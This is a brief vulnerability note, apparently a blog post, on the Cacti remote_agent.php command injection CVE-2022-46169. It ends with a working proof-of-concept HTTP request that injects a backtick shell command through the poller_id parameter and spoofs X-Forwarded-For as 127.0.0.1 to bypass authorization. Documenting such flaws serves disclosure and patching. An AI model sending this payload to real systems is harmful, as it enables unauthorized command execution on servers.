Cacti Remote_agent Php Remote Command Execution Vulnerability Cve 2022 46169
Cacti Remote_agent Php Remote Command Execution Vulnerability Cve 2022 46169
Cacti remote_agent.php remote command execution vulnerability CVE-2022-46169
Vulnerability Description
Cacti is a server monitoring and management platform.
Vulnerability Impact
Cacti < 1.2.17-1.2.22
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`id>1.txt`
X-Forwarded-For: 127.0.0.1
This post is licensed under CC BY 4.0 by the author.